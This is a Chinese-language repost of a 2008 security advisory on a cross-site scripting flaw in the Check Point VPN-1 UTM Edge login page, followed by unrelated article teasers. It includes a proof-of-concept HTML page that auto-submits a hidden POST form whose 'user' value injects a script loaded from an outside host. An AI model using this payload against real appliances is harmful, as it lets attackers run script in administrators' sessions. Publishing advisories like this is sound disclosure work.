安科网

Check Point VPN-1 UTM Edge登录页面跨站脚本漏洞

sxl0

sxl0

2008-10-07

关注 关注
受影响系统:
Check Point Software VPN-1 UTM Edge NGX 7.0.48x
不受影响系统:
Check Point Software VPN-1 UTM Edge NGX 7.5.48
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28116VPN-1 UTM Edge是集成了防病毒、防火墙、入侵防护和VPN技术的安全接入解决方案。 VPN-1 UTM Edge的管理界面在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞执行跨站脚本攻击。VPN-1 UTM Edge的登录页面没有正确地过滤user参数便返回给了用户,这允许攻击者通过跨站脚本攻击在用户浏览器会话中执行任意HTML和脚本代码。由于设备不接受GET请求中的参数,因此攻击者必须要使用POST请求来利用这个漏洞。<*来源:Henri Lindberg ([email protected]

链接:http://secunia.com/advisories/29243/
http://marc.info/?l=bugtraq&m=120483120818369&w=2
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none"><input name="user" value="'&lt;script/src=//l7.fi&gt;&lt;/script&gt;"></form>
</body>
</html>建议:
--------------------------------------------------------------------------------
厂商补丁:Check Point Software
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.checkpoint.com

edg战队 跨站攻击 网络安全

sxl0

sxl0

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

如何使用Edge DevTools分析Web应用程序API

是的,这过于简单,但实际上很少有场合需要全新的东西。HTTP是一种简化,但也是一种混淆。如果我们使用的一切其底层都是HTTP,我们为何构建可处理那些API的测试和开发工具?虽然Open API Initiative及其他方法对于规范如何描述和实现基于HT

fubrty 2020-09-08

Win10预览版1709PDF文档怎么设置默认edge浏览器打开?

想要浏览一个PDF文档,双击后发现用的是第三方阅读器打开的,而笔者习惯使用edge浏览器浏览pdf文档,这该如何设置pdf文档默认用edge浏览器打开呢?下面我们就来看看详细的教程。Win10下pdf文件无法复制粘贴怎么办?Win10怎么设置pdf/psd

84226832 2020-08-12

Hyperledger Fabric【区块链学习一】

什么是区块链在我们没有接触的时候,只知道它是一个去中心化的存储方式。当我们发生交易,或者动作的时候我们会将记录通知给所有参与者共同维护,达到去中心化的进行存储。并且我们会将记录使用加密技术保证记录一旦添加到了账本中就无法修改这个也就是区块链有时候被称为证明

pxy 2020-08-15

后疫情时代边缘计算(Edge Computing)的未来

物联网、5G以及AR / VR的兴起一直在推动将计算带入网络边缘的需求。但是现在,在新冠病毒COVID-19大流行中,对高速网络的日益增长的需求正以前所未有的速度加速发展。我们看到视频会议和内容流达到了创纪录的高水平,这两者都需要更高带宽和更低延迟数据传

84271849 2020-08-07

edge浏览器导出execl只能选中.txt格式

const fileName = parseTime + ‘-‘ + name + ‘.‘ + suffix

ELEMENTS爱乐小超 2020-05-28

zero-knowledge

总结了已有的隐私保护方案,重点聚焦于零知识证明技术,阐述并分析了零知识证明应用到区块链隐私保护方案中的技术挑战,并给出了具有指导意义的解决方案。因此,隐私保护成为了制约区块链应用发展的瓶颈之一。在匿名发送中,主节点承担了保护隐私的责任,存在被攻击的可能。在

2020-05-27

Configuring MariaDB with Option Files - MariaDB Knowledge Base

Configuring MariaDB with Option Files - MariaDB Knowledge Basehttps://mariadb.com/kb/en/configuring-mariadb-with-option-files/#d

aliuge 2020-05-12

Microsoft Edge提示网站“与此站点的连接并非完全安全”

以下为解决方法。| 如果您是网站的用户此问题需要联系网站管理员进行解决,您可遵循浏览器的建议,减少输入个人隐私数据。此问题的出现,意味着您的网站页面中存在http开头的链接,请检查是否所有都链接都是https开头的链接。

fraternityjava 2020-05-09

Cooperative Vehicular Content Distribution in Edge Computing Assisted 5G-VANET

首先介绍了一种基于边缘计算的分层结构,用于大容量车辆数据的高效分配。在此基础上,提出了一种多位置多因素预取方案,以适应快速的拓扑变化和不平衡的交通量。邻节点可以服务于虚拟主机的内容请求,提高了共享效率,减轻了网络的负担。利用图论方法将内容分布问题转化为最大

84483762 2020-05-03

戴尔dell poweredge r730服务器系统安装配置详解教程

首先我们开机进入小型BIOS设置一下RAID,或者进入服务器管理系统,在系统的BIOS中进行RAID设置;由于划分RAID5后,硬盘总大小还有6TB,大于2TB不支持BIOS启动,先划分个小磁盘安装系统。按CTRL+N切换到 PD MGMT菜单,可以看到磁

sapliang 2020-04-24

Hyperledger Fabric(四)first-network案例中的主要配置文件及主要脚本

Cryptogen工具使用该文件生成“密码材料”,即Fabric网络中各种实体所需的证书及密钥。该配置文件中的“count”变量用来指定每个组织的对等点数量,文件的其余部分较容易理解。cryptogen generate --config=./crypto

Walter的学习笔记 2020-03-04

Hyperledger Fabric(二)运行测试网络(test-network)

① cd fabric-samples/test-network #进入test-network目录下,关键脚本network.sh包含了启动网络,创建通道,销毁网络等功能,./network.sh -h可查看详细信息。②./network.sh up #

Aggressivesnail 2020-03-03

Hyperledger-fabric 环境搭建

因为众所周知的原因,国内网络不是很通畅,使用魔法后设置允许局域网使用。Download the latest version of git if it is not already installed, or if you have problems ru

阳光岛主 2020-02-21

Canny,先Scharr得梯度再Canny,三通道黑色背景展示结果(OpenCV案例源码edge.cpp)

有所更改,参数不求完备,但求实用。const string window_name1 = "Edge map : Canny default ";const string window_name2 = "Edge map :

hell0kitty 2020-02-19

[AST ESlint] Prevent Console log, edge case, variable reference

For eslint prevent console plugin, we also want to prevent user do so:. const disallowedMethods = [‘log‘, ‘info‘, ‘warn‘, ‘error

tozeroblog 2020-02-17

hyperledger fabric 1.4.4 + explorer搭建

基础配置:setenforce 0、关闭防火墙。上传下载的所有文件到centos中。执行如下命令进行镜像还原:。./byfn.sh up -l java -o etcdraft -s couchdb. 上面红色部分需要改成实际的fabric配置路径,默认为

baixiaoshi 2020-01-09

[Journey with golang] 1. Basic knowledge

golang写起来跟c++很不一样,在我看来,它更像是c++/java/python的混合体,再经过一系列增删之后的东西。golang最大的特点就是简洁,仅有25个关键字;它虽然是一门静态语言,但支持运行时动态类型;它不仅是强类型语言,还支持隐式类型推导。

GoatSucker 2020-01-01

Hyperledger Fabric动态配置Raft节点

最近看官方文档发现新的共识算法etcdRaft允许动态添加或删除排序节点,所以也花了一天时间操作了以下,写篇文章把整个过程记录一下。初始网络本文设置了4个Orderer节点,1个Peer节点,然后动态添加第五个Orderer节点。第二部分是更新Fabric

ShiShuo 2019-12-31

win10浏览器 edge浏览器收藏夹怎么导入?

MWin10正式版Edge浏览器如何导入其它浏览器收藏夹内容呢?icrosoft edge浏览器现在也可以导入其他浏览器的收藏夹内的链接到Microsoft edge收藏夹中去。不过需要把太统升级到10158版才可以。

87226636 2015-06-30

win10预览版10123上手体验全过程:edge浏览器新变

  win10预览版10123上手体验全过程来啦!下文小乐哥将为大家带来win10预览版10123版本,并说说win10预览版10123做了哪些修改和体验度怎么样?  微软windows系统负责人乔北峰在Build2015大会期间曾表示Win10最新一代系

Moabi 2015-05-16
sxl0

sxl0

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号